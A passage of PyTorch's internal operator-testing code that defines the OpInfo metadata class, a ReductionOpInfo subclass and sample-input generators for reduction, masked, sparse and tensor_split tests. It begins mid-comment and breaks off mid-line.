https://github.com/pytorch/pytorch/wiki/Developer-FAQ#how-does-out-work-in-pytorch # - that it works with the conjugate view bit properly # - that its function, method, and inplace variants perform the same operation # (that is, that torch.add, torch.Tensor.add, and torch.Tensor.add_ all # do the same thing). # - that its inplace variant preserves the input's storage # - that its gradient formula is implemented correctly, and that it supports # gradgrad and complex grad and gradgrad and forward mode AD properly for # the op's function and inplace variants (method variants are skipped # to reduce test time). # - that the operation performs the same operation when traced or scripted # using the jit # - that the operation is autodifferentiated by the jit as expected # - that the operator's aliases, if any, perform the same operation and that # the jit understands the alias # - that the operator throws the correct errors (if error_inputs is defined) # - that the operator produces the same results as a NumPy reference (if ref is defined) # - that the operator produces the same results as a NumPy reference on an extended # set of "reference inputs" (if both ref and reference_inputs_func are defined) # (NOTE: elementwise unary and elementwise binary OpInfos do this even if only # ref is defined, because they effectively autogenerate reference inputs) # - that the operator works on different CUDA devices # # Additional OpInfo tests are in test_jit_fuser_te.py, test_fx_experimental.py, # and test_fx.py. These tests validate that operators work with NNC and FX # as expected. # # For performance, some of the above tests may only run on the first # SampleInput returned by an OpInfo's sample input function. # # In addition to these tests, some subclasses (discussed in the next section) # define additional tests. # # Critically, as mentioned above, what's not necessarily tested is that the operator # works as expected. When implementing an OpInfo an engineer must still # typically write one or more tests validating the operator's behavior. # The exception to this is if reference testing is sufficient, or if # the operation belongs to an OpInfo subclass that has more exhaustive # operator testing. Elementwise unary and elementwise binary operators, # in particular, usually don't require additional testing beyond # writing an Opinfo. # # # OPINFO (SUB)CLASSES # ~~~~~~~~~~~~~~~~~~~ # # In addition to the OpInfo base class there are several specialized OpInfo # subclasses. For example, the UnaryUfuncInfo subclass is used for # unary elementwise operations. These operations have a common structure # that test_unary_ufuncs.py exploits with additional automated testing. # The automated testing in test_unary_ufuncs.py is so thorough, comparing # the operator to a NumPy reference function on a plethora of values, that # just implementing an OpInfo for a unary elementwise operation is often # sufficient testing. # # The ForeachFuncInfo is another OpInfo subclass that is hyper-specialized to a # very unique class of operations. These OpInfos aren't included in the # op_db sequence and have their own tests. # # Other OpInfo subclasses, like SpectralFuncInfo, are just for convenience # when writing OpInfos. # # TESTING A NEW OPERATOR # ~~~~~~~~~~~~~~~~~~~~~~ # # If you're adding a new operator to any of the following namespaces: # - torch # - torch.fft # - torch.linalg, # - torch.special # - torch.nn.functional # then you should typically add an OpInfo for it. # # As mentioned a couple times above, implementing an OpInfo is not # usually sufficient testing (unless the operator is a unary or binary elementwise # operator). The OpInfo will only test the properties described in the # "WHAT'S TESTED" section. It DOES NOT necessarily verify that the operator is # implemented correctly. # # TIPS FOR WRITING AN OPINFO AND OPINFO TESTS # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # Writing an OpInfo can be a little daunting. Since the point of an OpInfo is to # be consumed by a variety of systems it can be hard to understand how to # deal with test failures or how to set the OpInfo metadata properly. # # Before adding an OpInfo it helps to look at other OpInfos. A sample inputs # function must be defined, and the operator's dtypes must be specified. # Once that's done you should run the operator's tests in test_ops.py # (these can be filtered using the "-k" argument in pytest). Tests that # fail should provide an error message that describes what to change about # your OpInfo. You don't need to worry about changing an OpInfo's default # values unless a test yells at you. # # Similarly, if you're writing a test that consumes OpInfos then it's critical # your test provides a clear error message describing what to do when it # fails. You should not assume the OpInfo implementer is familiar with your # system. # # If you see a confusing error message while developing an OpInfo then please # file an issue describing what happened. # # This trial-and-error approach to writing an OpInfo can be frustrating, # but it's probably necessary as long as OpInfos don't require # learning about all the systems that consume them. One thing that can help # is the get_supported_dtypes() function defined in opinfo_helper.py. This # function can be used to programmatically specify the dtypes an operator # supports, and is especially useful if writing an OpInfo on a machine # without a CUDA device. See its documentation for more details. # # THE FUTURE OF OPINFOS AND OPINFO TESTING # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # In the future we expect OpInfo coverage to improve and cover # the great majority of PyTorch's (public) operators. # # Classes and methods for the operator database @dataclass class OpInfo(object): """Operator information and helper functions for acquiring it.""" # the string name of the function name: str # An optional reference function that accepts ndarrays (AKA "NumPy arrays"). # If given, the op will be compared with its reference on each of its sample inputs. ref: Callable = None # the following metadata describes the operator, its variants, and its aliases, if any # iterable of aliases, e.g. ("absolute",) for torch.abs aliases: Iterable = None # additional string to include in the test name # this is useful when an op needs multiple OpInfos, # like divide does, often because it's really several # different ops behind the scenes variant_test_name: str = '' # the function variant of the operation, populated as torch.<name> if None op: Callable = None # allows the method variant of this operation to be specified as follows: # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name # - if None, then the OpInfo explicitly specifies is has no associated method # - if a Callable, then that callable should be the method associated with this operation method_variant: Callable = _NOTHING # allows the inplace variant of this operation to be specified as follows: # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name # - if None, then the OpInfo explicitly specifies is has no associated inplace variant # - if a Callable, then that callable should be the inplace variant associated with this operation inplace_variant: Callable = _NOTHING # allows the operator variant of this operation to be specified as follows: # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name # - if None, then the OpInfo explicitly specifies is has no associated operator # - if a Callable, then that callable should be the operator associated with this operation operator_variant: Callable = _NOTHING # allows the inplace operator variant of this operation to be specified as follows: # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name # - if None, then the OpInfo explicitly specifies is has no associated inplace operator # - if a Callable, then that callable should be the inplace operator associated with this operation inplace_operator_variant: Callable = _NOTHING # the following metadata are test directives for skipping or modifying tests # information about which tests to skip skips: Tuple = tuple() # decorators to apply to generated tests decorators: Tuple = tuple() # the following are pointers to functions to generate certain classes of inputs # function to generate sample inputs with strided layouts sample_inputs_func: Callable = None # function to generate a more thorough set of samples inputs with strided layouts reference_inputs_func: Callable = None # function to generate inputs that will throw errors error_inputs_func: Callable = None # function to generate sample inputs with sparse coo layouts sample_inputs_sparse_coo_func: Callable = None # function to generate sample inputs with sparse csr layouts sample_inputs_sparse_csr_func: Callable = None # the following metadata relates to dtype support and is tested for correctness in test_ops.py # dtypes this function works with on the CPU, # inherited by other device types that don't specify their own dtypes dtypes: _dispatch_dtypes = None # the following dtypesIf... options override the dtypes value on their respective device types # dtypes this function is expected to work with on CUDA dtypesIfCUDA: _dispatch_dtypes = None # dtypes this function is expected to work with on ROCM dtypesIfROCM: _dispatch_dtypes = None # backward dtypes this function is expected to work with backward_dtypes: _dispatch_dtypes = None # backward dtypes this function is expected to work with on CUDA backward_dtypesIfCUDA: _dispatch_dtypes = None # backward dtypes this function is expected to work with on ROCM backward_dtypesIfROCM: _dispatch_dtypes = None # the following metadata describes the operators out= support # whether the op supports the out kwarg # defaults to True, if the op does not allow the out kwarg or # supports it incorrectly then test_out in test_ops.py should fail supports_out: bool = True # the following metadata relates to autograd support # whether the operation supports backward mode AD # if true, gradient correctness is tested in test_ops.py # using the op's sample inputs supports_autograd: bool = True # whether the op supports second order gradients # if true, gradgrad correctness is tested in test_ops.py # defaults to support_autograd's value # TODO: rename this to supports_bwgrad_bwgrad to be consistent with below supports_gradgrad: bool = None # whether the ops supports second order gradients via # forward-over-reverse. If True, forward-over-reverse gradgrad correctness # is tested. If False, test that forward grad is not implemented. # Defaults to False. supports_fwgrad_bwgrad: bool = False # whether the operation supports inplace autograd # if true, tested in test_ops.py # defaults to supports_autograd's value supports_inplace_autograd: bool = None # Whether the operation support forward mode AD # If the value is True, we check that the gradients are correct # If the value is False, we test that forward grad is not implemented supports_forward_ad: bool = False # wrapper function for gradcheck gradcheck_wrapper: Callable = lambda op, *args, **kwargs: op(*args, **kwargs) # whether to check batched grad when doing gradcheck # defaults to support_autograd's value check_batched_grad: bool = None # whether to check batched grad grad when doing gradgradcheck # default's to support_gradgrad's value check_batched_gradgrad: bool = None # whether to check batched forward grad when doing gradcheck # defaults to the value of `supports_forward_ad` check_batched_forward_grad: bool = None # whether to check batched forward grad when doing gradcheck # defaults to the value of `check_batched_forward_grad` check_inplace_batched_forward_grad: bool = None # tolerance for nondeterminism while performing gradcheck gradcheck_nondet_tol: float = 0.0 # Whether to use the fast implmentation for gradcheck/gradgradcheck. # When set to None, defers to the default value provided by the wrapper # function around gradcheck (testing._internal.common_utils.gradcheck) gradcheck_fast_mode: bool = None # the following metadata relates to JIT support and is tested for correctness in test_ops.py # name of the corresponding aten:: operator aten_name: str = None # if this is a composite implicit autograd op, the decomposed op decomp_aten_name: Optional[str] = None # name of the corresponding aten:: operator for backwards aten_backward_name: Optional[str] = None # if a op's aten::node is expected to be symbolically autodiffed assert_autodiffed: bool = False # a list of strings with node names that are expected to be in a # DifferentiableGraph when autodiffed. Ex: ['aten::add', 'aten::mm'], # default is populated to be ['aten::(name of Python operator)'] autodiff_nonfusible_nodes: List[str] = None # a list of strings with node names that are expected to be in FusionGroups # inside of DifferentiableGraphs when this operation is autodiffed. # Ex: ['aten::add', 'aten::mm'], defaults to an empty list # Note: currently no ops use fusible nodes autodiff_fusible_nodes: List[str] = None # the following metadata relates to sparse support and is used in test_sparse.py # whether the op supports sparse inputs supports_sparse: bool = False # only run tracing tests supports_scripting: bool = True # the following metadata relates to sparse csr support and is used in test_sparse_csr.py # whether the op supports sparse csr inputs supports_sparse_csr: bool = False # the following metadata relates to complex support and is checked in test_ops.py test_conjugated_samples: bool = True test_neg_view: bool = True # assert that jit shape analysis fully propagates shape assert_jit_shape_analysis: bool = False # the following metadata relates to ExpandedWeights support and is checked in test_expanded_weights.py supports_expanded_weight: bool = False def __post_init__(self): self._original_opinfo_args = asdict(self).copy() assert self.dtypes is not None, "OpInfo for {0} has no dtypes!".format(self.name) dtypes_args = (self.dtypes, self.dtypesIfCUDA, self.dtypesIfROCM) # Validates the dtypes are generated from the dispatch-related functions for dtype_list in dtypes_args: assert isinstance(dtype_list, (_dispatch_dtypes, type(None))) if self.aten_name is None: self.aten_name = self.name # Attribute to verify dynamic_dtypes are used. self.dynamic_dtypes = any(map(lambda dtypes: isinstance( dtypes, opinfo_helper._dynamic_dispatch_dtypes), dtypes_args)) if self.dynamic_dtypes: # Make sure `dtyesIfCUDA` is dynamic, if dynamic dispatch is used for CPU # This is because, below we set dtypesIfCUDA to dtypes if they are None. assert isinstance(self.dtypesIfCUDA, opinfo_helper._dynamic_dispatch_dtypes), \ (f"To use dynamic dypes for operator {self.name}, " "acquire the dtypes dynamically for argument `dtypesIfCUDA`." "This is to ensure that CUDA dtypes are acquired correctly as they" "differ from CPU dtypes occasionally") self.dtypes = set(self.dtypes) # NOTE: backward dtypes must be acquired before forward dtypes # since they fallback to explicit (not implicit!) specifications of # forward dtypes self.backward_dtypesIfROCM = set(self.backward_dtypesIfROCM) if self.backward_dtypesIfROCM is not None else ( self.backward_dtypesIfCUDA if self.backward_dtypesIfCUDA is not None else self.backward_dtypes if self.backward_dtypes is not None else self.dtypesIfROCM if self.dtypesIfROCM is not None else self.dtypesIfCUDA if self.dtypesIfCUDA is not None else self.dtypes) self.backward_dtypesIfCUDA = set(self.backward_dtypesIfCUDA) if self.backward_dtypesIfCUDA is not None else ( self.backward_dtypes if self.backward_dtypes is not None else self.dtypesIfCUDA if self.dtypesIfCUDA is not None else self.dtypes) self.backward_dtypes = set(self.backward_dtypes) if self.backward_dtypes is not None else self.dtypes self.dtypesIfCUDA = set(self.dtypesIfCUDA) if self.dtypesIfCUDA is not None else self.dtypes self.dtypesIfROCM = set(self.dtypesIfROCM) if self.dtypesIfROCM is not None else self.dtypesIfCUDA # NOTE: if the op is unspecified it is assumed to be under the torch namespace if not self.op: self.op = _getattr_qual(torch, self.name) if self.method_variant is _NOTHING: self.method_variant = getattr(torch.Tensor, self.name, None) # attributes like real, imag are not callable if not callable(self.method_variant): self.method_variant = None if self.inplace_variant is _NOTHING: inplace_name = self.name + "_" self.inplace_variant = getattr(torch.Tensor, inplace_name, None) if self.operator_variant is _NOTHING: self.operator_variant = getattr(operator, self.name, None) if self.inplace_operator_variant is _NOTHING: # Note: operator.i<op> will use operator.<op> and assign the result to the lhs when no # __i<op>__ method is found. This results in the appearance of an inplace operator variant which # does not have the correct inplace behavior. To avoid this, we guard automatic detection of the inplace # operator with a check that an inplace variant exists. if self.inplace_variant is not None: inplace_operator_name = "i" + self.name self.inplace_operator_variant = getattr(operator, inplace_operator_name, None) else: self.inplace_operator_variant = None self.decorators = (*self.decorators, *self.skips) # We run the sampling functions without tracking the gradiends of the creation of inputs self.sample_inputs_func = torch.no_grad()(self.sample_inputs_func) self.sample_inputs_sparse_coo_func = torch.no_grad()(self.sample_inputs_sparse_coo_func) self.sample_inputs_sparse_csr_func = torch.no_grad()(self.sample_inputs_sparse_csr_func) if self.reference_inputs_func is not None: self.reference_inputs_func = torch.no_grad()(self.reference_inputs_func) if not self.autodiff_fusible_nodes: self.autodiff_fusible_nodes = [] if self.autodiff_nonfusible_nodes is None: self.autodiff_nonfusible_nodes = ['aten::' + self.name] # Autograd support # Autograd flags that depend on backward AD only # - If setting has been explicitly set, raise error if inconsistent if self.supports_gradgrad is None: self.supports_gradgrad = self.supports_autograd else: assert not (self.supports_gradgrad and not self.supports_autograd), ( "supports_gradgrad refines the part of autograd is supported, so it should " "not be set if supports_autograd is False") if self.check_batched_grad is None: self.check_batched_grad = self.supports_autograd or self.supports_forward_ad else: assert not (self.check_batched_grad and not (self.supports_autograd or self.supports_forward_ad)), ( "check_batched_grad refines the part of autograd that will be checked (by gradcheck), so " "it should not be set if supports_autograd is False") if self.check_batched_gradgrad is None: self.check_batched_gradgrad = self.supports_gradgrad else: assert not (self.check_batched_gradgrad and not self.supports_gradgrad), ( "check_batched_gradgrad refines the part of autograd that will be checked (by " "gradgradcheck), so it should not be set if either supports_gradgrad or supports_autograd " "is False.") if self.check_batched_forward_grad is None: self.check_batched_forward_grad = self.supports_forward_ad else: assert not (self.check_batched_forward_grad and not self.supports_forward_ad), ( "check_batched_forward_grad should only be used when supports_forward_ad " "is True. It is used to disable the test in the specific cases " "where the op supports forward ad but fails to compute " "batched forward grad.") if self.check_inplace_batched_forward_grad is None: self.check_inplace_batched_forward_grad = self.check_batched_forward_grad else: assert not (self.check_inplace_batched_forward_grad and not self.check_batched_forward_grad), ( "check_batched_forward_grad should only be used when check_batched_forward_grad " "is True. It is used to disable the test in the specific cases " "where the op supports batched forward grad but fails to compute batched forward " "grad for the inplace variant of the op.") assert not (self.supports_fwgrad_bwgrad and not self.supports_autograd), ( "supports_fwgrad_bwgrad enables forward-over-backward gradgrad checks and should only be " "True if backward ad is also checked, i.e., supports_forward_ad should be True.", self.name) # Autograd flags that depend on both forward AD and backward AD if self.supports_inplace_autograd is None: self.supports_inplace_autograd = self.supports_autograd or self.supports_forward_ad else: assert not (self.supports_inplace_autograd and not self.supports_autograd and not self.supports_forward_ad), ( "supports_inplace_autograd refines the part of autograd that is supported, so " "it should not be set if both supports_autograd and supports_forward_ad are False") if self.aliases is not None: self.aliases = tuple(AliasInfo(a) for a in self.aliases) # type: ignore[assignment] else: self.aliases = () def __call__(self, *args, **kwargs): """Calls the function variant of the operator.""" return self.op(*args, **kwargs) def __str__(self): return dataclass_repr(self) def get_op(self): """Returns the function variant of the operator, torch.<op_name>.""" return self.op def get_method(self): """Returns the method variant of the operator, torch.Tensor.<op_name>. Returns None if the operator has no method variant. """ return self.method_variant def get_inplace(self): """Returns the inplace variant of the operator, torch.Tensor.<op_name>_. Returns None if the operator has no inplace variant. """ return self.inplace_variant def get_operator(self): """Returns operator variant of the operator, e.g. operator.neg Returns None if the operator has no operator variant. """ return self.operator_variant def get_inplace_operator(self): """Returns the inplace operator variant of the operator, e.g operator.iadd Returns None if the operator has no inplace operator variant""" return self.inplace_operator_variant def conjugate_sample_inputs(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs but with the tensor input or first tensor in a sequence input conjugated. """ samples = self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) conj_samples = list(samples) def conjugate(tensor): _requires_grad = tensor.requires_grad tensor = tensor.conj() return tensor.requires_grad_(_requires_grad) for i, sample in enumerate(samples): sample = conj_samples[i] # Note: it is assumed that the input here is either a tensor or tensorlist if isinstance(sample.input, torch.Tensor): sample.input = conjugate(sample.input) else: sample.input[0] = conjugate(sample.input[0]) return tuple(conj_samples) def sample_inputs(self, device, dtype, requires_grad=False, **kwargs): """ Returns an iterable of SampleInputs. These samples should be sufficient to test the function works correctly with autograd, TorchScript, etc. """ samples = self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) if kwargs.get('include_conjugated_inputs', False): conj_samples = self.conjugate_sample_inputs(device, dtype, requires_grad, **kwargs) samples_list = list(samples) samples_list.extend(conj_samples) samples = tuple(samples_list) return samples def reference_inputs(self, device, dtype, requires_grad=False, **kwargs): """ Returns an iterable of SampleInputs. Distinct from sample_inputs() above because this returns an expanded set of inputs when reference_inputs_func is defined. If undefined this returns the sample inputs. """ if self.reference_inputs_func is None: return self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) if kwargs.get('include_conjugated_inputs', False): raise NotImplementedError return self.reference_inputs_func(self, device, dtype, requires_grad, **kwargs) def error_inputs(self, device, **kwargs): """ Returns an iterable of ErrorInputs. """ return self.error_inputs_func(self, device, **kwargs) def sample_inputs_sparse_coo(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs that contain inputs with sparse coo layout. """ return self.sample_inputs_sparse_coo_func(self, device, dtype, requires_grad, **kwargs) def sample_inputs_sparse_csr(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs that contain inputs with sparse csr layout. """ return self.sample_inputs_sparse_csr_func(self, device, dtype, requires_grad, **kwargs) def get_decorators(self, test_class, test_name, device, dtype): '''Returns the decorators targeting the given test.''' result = [] for decorator in self.decorators: if isinstance(decorator, DecorateInfo): if decorator.is_active(test_class, test_name, device, dtype): result.extend(decorator.decorators) else: result.append(decorator) return result def supported_dtypes(self, device_type): if device_type == 'cpu': return self.dtypes if device_type == 'cuda': return self.dtypesIfROCM if TEST_WITH_ROCM else self.dtypesIfCUDA else: return self.dtypes def supported_backward_dtypes(self, device_type): if not self.supports_autograd: return set() backward_dtypes = None if device_type == 'cpu': backward_dtypes = self.backward_dtypes elif device_type == 'cuda': backward_dtypes = self.backward_dtypesIfROCM if TEST_WITH_ROCM else self.backward_dtypesIfCUDA else: backward_dtypes = self.backward_dtypes allowed_backward_dtypes = floating_and_complex_types_and(torch.bfloat16, torch.float16, torch.complex32) return set(allowed_backward_dtypes).intersection(backward_dtypes) def supports_dtype(self, dtype, device_type): return dtype in self.supported_dtypes(device_type) @property def formatted_name(self): """Returns a formatted full name for this OpInfo that can be used in test names.""" variant = '_' + self.variant_test_name.replace('.', '_') if self.variant_test_name else '' return '{}{}'.format(self.name.replace('.', '_'), variant) def _generate_reduction_inputs(device, dtype, requires_grad, **kwargs): """Generates input tensors for testing reduction operators""" yield make_tensor([], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([2], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([3, 5], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([3, 2, 1, 2], dtype=dtype, device=device, requires_grad=requires_grad) def _generate_reduction_kwargs(ndim, supports_multiple_dims=True): """Generates a subset of all valid dim and keepdim kwargs given ndim that is appropriate for testing reduction operators. """ # Test default dim and keepdim yield {} # Test reducing inner and outer most dimensions yield {'dim': 0, 'keepdim': True} yield {'dim': -1, 'keepdim': False} # Test reducing middle dimension if ndim > 2: yield {'dim': ndim // 2, 'keepdim': True} if supports_multiple_dims: # Test reducing all dimensions yield {'dim': tuple(range(ndim)), 'keepdim': False} # Test reducing both first and last dimensions if ndim > 1: yield {'dim': (0, -1), 'keepdim': True} # Test reducing every other dimension starting with the second if ndim > 3: yield {'dim': tuple(range(1, ndim, 2)), 'keepdim': False} def sample_inputs_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for reduction operators.""" # TODO(@heitorschueroff) Once all reduction operators are using # ReductionOpInfo use op_info.supports_multiple_dims directly. supports_multiple_dims: bool = kwargs.get('supports_multiple_dims', True) # TODO(@heitorschueroff) Once all reduction operators are using ReductionOpInfo # use op_info.generate_args_kwargs directly. generate_args_kwargs = kwargs.get('generate_args_kwargs', lambda *args, **kwargs: (yield tuple(), {})) for t in _generate_reduction_inputs(device, dtype, requires_grad): for reduction_kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims): for args, kwargs in generate_args_kwargs(t, **reduction_kwargs): kwargs.update(reduction_kwargs) yield SampleInput(t.detach().requires_grad_(requires_grad), args=args, kwargs=kwargs) def _generate_masked_op_mask(input_shape, device, **kwargs): yield None yield make_tensor(input_shape, dtype=torch.bool, device=device, requires_grad=False) if len(input_shape) > 2: # broadcast last mask dimension: yield make_tensor(input_shape[:-1] + (1,), dtype=torch.bool, device=device, requires_grad=False) # broadcast middle mask dimension: yield make_tensor(input_shape[:1] + (1,) + input_shape[2:], dtype=torch.bool, device=device, requires_grad=False) # broadcast first mask dimension: yield make_tensor((1,) + input_shape[1:], dtype=torch.bool, device=device, requires_grad=False) # mask.ndim < input.ndim yield make_tensor(input_shape[1:], dtype=torch.bool, device=device, requires_grad=False) # mask.ndim == 1 yield make_tensor(input_shape[-1:], dtype=torch.bool, device=device, requires_grad=False) # masks that require broadcasting of inputs (mask.ndim > # input.ndim) will not be supported, however, we may # reconsider this if there will be demand on this kind of # degenerate cases. def sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators. Masked reduction operator is a reduction operator with trailing mask optional argument. A mask is a bool tensor with the same shape as input or a shape that is broadcastable to input shape. """ kwargs['supports_multiple_dims'] = op_info.supports_multiple_dims for sample_input in sample_inputs_reduction(op_info, device, dtype, requires_grad, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) yield SampleInput(sample_input.input.detach().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) if(not requires_grad and dtype.is_floating_point and sample_input.input.ndim == 2 and mask is not None and mask.shape == sample_input.input.shape): for v in [torch.inf, -torch.inf, torch.nan]: t = sample_input.input.detach() t.diagonal(0, -2, -1).fill_(v) yield SampleInput(t.requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) def sample_inputs_sparse_coo_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators that support inputs with sparse coo layouts. """ if op_info.supports_sparse: op_name = op_info.name.replace('_masked.', '') for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): mask = sample_input.kwargs.get('mask') if mask is not None: sample_input_kwargs = sample_input.kwargs.copy() sample_input_kwargs.update(mask=mask.to_sparse()) yield SampleInput(sample_input.input.to_sparse(), args=sample_input.args, kwargs=sample_input_kwargs) else: if op_name in {'prod', 'amax', 'amin'}: # FIXME: for now reductions with non-zero reduction identity and # unspecified mask are not supported for sparse COO # tensors, see torch._masked.prod implementation # for details. continue yield SampleInput(sample_input.input.to_sparse(), args=sample_input.args, kwargs=sample_input.kwargs) def sample_inputs_sparse_csr_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators that support inputs with sparse csr layouts. """ if op_info.supports_sparse_csr: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): if not (sample_input.input.ndim == 2 and sample_input.kwargs.get('keepdim')): # - sparse CSR tensors are always 2-D tensors # - masked reduction on CSR tensors are defined only if keepdim is True. continue mask = sample_input.kwargs.get('mask') if mask is not None: sample_input_kwargs = sample_input.kwargs.copy() sample_input_kwargs.update(mask=mask.to_sparse_csr()) new_sample = SampleInput(sample_input.input.to_sparse_csr(), args=sample_input.args, kwargs=sample_input_kwargs) else: if op_info.name.lstrip('_masked.') in ['prod']: # reductions with non-zero reduction identity and # unspecified mask is not supported for sparse CSR # tensors, see torch._masked.prod implementation # for details. continue new_sample = SampleInput(sample_input.input.to_sparse_csr(), args=sample_input.args, kwargs=sample_input.kwargs) yield new_sample if sample_input.kwargs['dim'] == 0: # Reductions of CSR tensors use different implementations for # inner and/or outer dimensions. So, as a minimum of testing CSR # implementations the following kwargs must be generated: # dict(dim=0, keepdim=True) # dict(dim=1, keepdim=True) # dict(dim=(0, 1), keepdim=True) # Here we generate the dim=1 case from the dim=0 case. sample_input_kwargs = new_sample.kwargs.copy() sample_input_kwargs.update(dim=1) yield SampleInput(new_sample.input.clone(), args=sample_input.args, kwargs=sample_input_kwargs) def sample_inputs_masked_norm(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked norm. """ for ord in [2.0, 1, float('inf'), float('-inf'), 0]: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): sample_input_args, sample_input_kwargs = (ord,) + sample_input.args, sample_input.kwargs.copy() yield SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) def sample_inputs_masked_std_var(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked std/var. """ for unbiased in [False, True]: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): if sample_input.args: dim = sample_input.args[0] sample_input_args = sample_input.args[:1] + (unbiased,) + sample_input.args[1:] sample_input_kwargs = sample_input.kwargs.copy() else: dim = sample_input.kwargs.get('dim') sample_input_args = sample_input.args sample_input_kwargs = dict(sample_input.kwargs, unbiased=unbiased) if requires_grad: if sample_input_kwargs.get('mask') is None: orig_count = torch._masked.sum(torch.ones(sample_input.input.shape, dtype=torch.int64), dim, keepdim=True) else: inmask = torch._masked._input_mask(sample_input.input, *sample_input_args, **sample_input_kwargs) orig_count = torch._masked.sum(inmask.new_ones(sample_input.input.shape, dtype=torch.int64), dim, keepdim=True, mask=inmask) if orig_count.min() <= int(unbiased) + 1: # Skip samples that lead to singularities in var # computation resulting nan values both in var and # autograd output that test_grad_fn cannot handle # correctly. Also, skip samples when the autograd output # for std could not be handled correctly due to torch.sqrt continue yield SampleInput(sample_input.input.detach().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) # NOTE [Reductions]: # # For testing purposes, we relax the definition of a reduction operator # as defined in the docstring below. We do this to capture operators with # a similar API so they can be tested automatically. However... # # Strictly speaking a reduction operator is an operator that can reduce an # array to a single scalar value and that can be computed from the partial # result of reducing subarrays. This usually means that the reduction operation # should be commutative and associative. This definition is important when it # comes to implementation as it determines how a reduction can be parallelized. # # For example, many summary statistics such as median, mode and quantile cannot # be computed from partial results because these are sorting and counting based # algorithms that need information that would be lost in the reduced value. class ReductionOpInfo(OpInfo): """Reduction operator information. An operator is a reduction operator if it reduces one or more dimensions of the input tensor to a single value. Reduction operators must implement the following signature: - `op(input, *args, *, dim=None, keepdim=False, **kwargs) -> Tensor` ReductionOpInfo tests that reduction operators implement a consistent API. Optional features such as reducing over multiple dimensions are captured in the optional keyword parameters of the ReductionOpInfo constructor. If a reduction operator does not yet implement the full required API of reduction operators, this should be documented by skipping the failing tests rather than adding optional parameters to ReductionOpInfo. NOTE The API for reduction operators has not yet been finalized and some requirements may change. See tests in test/test_reductions.py """ def __init__( self, name, *, # The identity value for the operator if it has one. identity: Optional[Any] = None, # The nan policy for the operator if it implements one. # - propagate: NaN values are propagated to the output # - omit: NaN values are discarded during the reduction nan_policy: Optional[str] = None, # Whether the operator supports reducing multiple dimensions. supports_multiple_dims: bool = True, # Whether the operator promotes integral to floating point dtypes. promotes_int_to_float: bool = False, # Whether the operator promotes all integral dtypes to int64. promotes_int_to_int64: bool = False, # If a specific dtype is given, then the operator always returns that # dtype irrespective of the input dtype. If None, the operator returns # the dtype according to the type promotion rules above. result_dtype: Optional[torch.dtype] = None, # Casts complex results to real (e.g. linalg.norm or torch.var) complex_to_real: bool = False, # ReductionOpInfo tests generate their own input, dim and keepdim # arguments and call this function to generate tuples of extra args and # kwargs to use when calling the op. This is required for operators that # have other required parameters besides the input tensor. generate_args_kwargs: Callable = lambda t, dim=None, keepdim=False: (yield tuple(), {}), # Options from the OpInfo base class **kwargs, ): self._original_reduction_args = locals().copy() assert nan_policy in (None, 'propagate', 'omit') # These are mutually exclusive options assert not (result_dtype and promotes_int_to_float) assert not (result_dtype and promotes_int_to_int64) assert not (result_dtype and complex_to_real) assert not (promotes_int_to_float and promotes_int_to_int64) # Default sample_inputs_func for ReductionOpInfo which augments sample # inputs from sample_inputs_reduction with the args and kwargs from # generate_args_kwargs. This is only used if sample_inputs_func is None. def sample_inputs_func(*args, **kwargs): kwargs['supports_multiple_dims'] = supports_multiple_dims kwargs['generate_args_kwargs'] = generate_args_kwargs yield from sample_inputs_reduction(*args, **kwargs) # Override OpInfo defaults and call base class __init__ kwargs.setdefault('inplace_variant', None) kwargs.setdefault('sample_inputs_func', sample_inputs_func) super().__init__(name, **kwargs) self.identity = identity self.nan_policy = nan_policy self.supports_multiple_dims = supports_multiple_dims self.promotes_int_to_float = promotes_int_to_float self.promotes_int_to_int64 = promotes_int_to_int64 self.complex_to_real = complex_to_real self.result_dtype = result_dtype self.generate_args_kwargs = generate_args_kwargs def sample_inputs_tensor_split(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) args_cases = ( # Cases with tensor indices. (torch.tensor([1, 2, 3]),), (torch.tensor(1),), (torch.tensor([1, 2, 3]), 1), (torch.tensor([1, 4, 2, 5, 3, 6])[::2], 1), # Cases with list of indices. ((2, 4),), ((2, 4), 1), ((2, 4), -1), # Cases with integer section. (3,), (3, 1), (3, -1), ) for args in args_cases: yield SampleInput(make_input((S, S, S)), args=args) def sample_inputs_linalg_det(op_info, device, dtype, requires_grad, **kwargs): kw = 